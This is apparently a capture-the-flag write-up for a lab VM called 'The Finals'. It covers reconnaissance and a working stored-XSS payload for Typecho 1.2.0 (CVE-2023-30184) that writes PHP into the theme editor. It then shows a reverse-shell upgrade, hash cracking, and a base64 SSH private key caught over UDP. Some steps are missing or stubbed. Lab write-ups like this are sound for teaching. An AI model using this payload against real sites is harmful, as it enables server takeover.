nmap -sCV -p- -O -vvv -oA thefinalsSCAN 10.10.1.12
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 9.9 (protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.62 ((Unix))
| http-methods:
| Supported Methods: HEAD GET POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-title: THE FINALS
|_http-server-header: Apache/2.4.62 (Unix)
OS details: Linux 4.15 - 5.8
80/tcp HTTP
Looks like a website for the game providing some info about the arenas, sponsors, and modes.
After some manual recon, nothing is interesting about this website. So now let's move on to directory brute forcing.
The directory screenshots have some pictures, but all are the same picture. But we get good information that there is a web app, probably a CMS named Typecho, and it's version 1.2.0
Blog / Typecho
I have added thefinals.hmv to /etc/hosts
sudo sh -c 'echo "10.10.1.12 thefinals.hmv" >> /etc/hosts'
Using Wappalyzer extension, we double-checked that the blog is using Typecho and the version is 1.2.0
Now we start looking for a public exploit.
There are 18 CVEs, 8 of which are XSS. We don't have an account, and bruteforcing this wouldn't be the best idea because we don't know the password policy (8-character string), it's not telling if there a special characters or numbers, or case char, etc
So we need to look for an unauthenticated exploit.
CVE-2023-30184 / Stored XSS
How could we use this stored XSS to get a shell?
From this excellent blog, we got this exploit. This exploit uses a stored XSS to silently open Typecho's theme editor in a hidden iframe and overwrite 404 with malicious PHP code.
To test if it's working or not, the creator wants to execute phpinfo.
function insertIframe() {
var urlWithoutDomain = window.location.pathname;
var hasManageComments = urlWithoutDomain.includes("manage-comments.php");
var tSrc='';
if (hasManageComments){
tSrc=urlWithoutDomain.replace('manage-comments.php','theme-editor.php?theme=default&file=404.php');
}else{
tSrc='/admin/theme-editor.php?theme=default&file=404.php';
}
var iframeAttributes = "<iframe id='theme_id' src='"+tSrc+"' width='0%' height='0%' onload='writeShell()'></iframe>";
var originalContent = document.body.innerHTML;
document.body.innerHTML = (originalContent + iframeAttributes);
}
var isSaved = false;
function writeShell() {
if (!isSaved) {
var content = document.getElementById('theme_id').contentWindow.document.getElementById('content');
var btns = document.getElementById('theme_id').contentWindow.document.getElementsByTagName('button');
var oldData = content.value;
content.value = ('<?php phpinfo(); ?>\n') + oldData;
btns[1].click();
isSaved = true;
}
}
insertIframe();
This is the payload we will use in the "Website" field in the comment section.
id
uid=102(apache) gid=103(apache) groups=82(www-data),103(apache),103(apache)
# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/ash")'
Ctrl-Z
# In Kali
$ stty raw -echo
$ fg
$ stty -a # take rows and columns numbers for the last command
# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>
ls -la /home
drwxr-sr-x 2 june users 4096 Apr 3 17:00 june
drwx------ 4 scotty users 4096 Apr 23 17:28 scotty
drwx------ 4 staff users 4096 Apr 3 13:36 staff
Due to these permissions, we can read and execute in June's directory
I loved how the creator added the finals logo. Also, the message, if I am not wrong, is related to the game.
Going back to CMS, we found the config, and it has MySQL credentials
john hash
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 SSE2 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
But since I don't like using the VM to crack the password because it takes a lot of time
cat /var/log/scotty-main.log
Broadcast to eth0 10.10.1.15:1337
# and 1100+ line like it :)
So now we need to listen on port 1337 on the VM and wait for a couple of minutes, but nothing happens. Knowing that port 1337 isn't listening, eliminate the idea of connecting to from our box to the vm on port 1337. Maybe UDP?
nc -nvlp 1337
# listen on UDP
nc -unvlp 1337
listening on [::]:1337 ...
connect to [::ffff:10.10.1.15]:1337 from [::ffff:10.10.1.15]:34232 ([::ffff:10.10.1.15]:34232)
LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFNd0FBQUF0emMyZ3RaVwpReU5UVXhPUUFBQUNBMXduMDk0cGhPcXNmYm8rbzNDQllpTjN4QTE2eW1LU2JYMlVZMzJ4L0FFd0FBQUpnRGMvWVVBM1AyCkZBQUFBQXR6YzJndFpXUXlOVFV4T1FBQUFDQTF3bjA5NHBoT3FzZmJvK28zQ0JZaU4zeEExNnltS1NiWDJVWTMyeC9BRXcKQUFBRUN2N2tmZW9YT1FDaTVDUklXZEhpRFQ1dXBLeVkzdlF4QWxLbXhFUXpSWkxEWENmVDNpbUU2cXg5dWo2amNJRmlJMwpmRURYcktZcEp0ZlpSamZiSDhBVEFBQUFFbkp2YjNSQWRHaGxabWx1WVd4ekxtaHRkZ0VDQXc9PQotLS0tLUVORCBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0K
we get a base64 string and by decoding it. it's ssh private key for propably scotty
Changing the key permssion is a must unless you will use sudo, if you didn't change it and didn't use sudo you will get this message
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
Permissions 0777 for 'key' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "key": bad permissions
scotty@10.10.1.15: Permission denied (publickey,keyboard-interactive).
Shell as Scotty
The first thing to do when you have shell as they taught us in privilege escalation courses is sudo -l
When I tried this for Apache, it requested a password, but for Scotty, it's telling us we can use a binary named secret.
sudo -l
User scotty may run the following commands on thefinals:
(ALL) NOPASSWD: /sbin/secret
sudo /sbin/secret
/sbin/secret: line 2: can't create /dev/pts/99: Permission denied
ls -la /dev/pts/
total 0
drwxr-xr-x 2 root root 0 May 20 01:09 .
drwxr-xr-x 14 root root 2840 May 20 01:09 ..
crw--w---- 1 apache tty 136, 0 May 20 03:06 0
crw--w---- 1 scotty tty 136, 1 May 20 03:11 1
c--------- 1 root root 5, 2 May 20 01:09 ptmx
A stored cross-site scripting (XSS) vulnerability in Typecho v1.2.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the url parameter at /index.php/archives/1/comment. {}
We could have also know about this by knowing that it's alpine linux {}
Upgrade TTY {}
Hope you liked the walkthrough, you can try the VM on also you can try the finals game on , and I'm sure you will like it
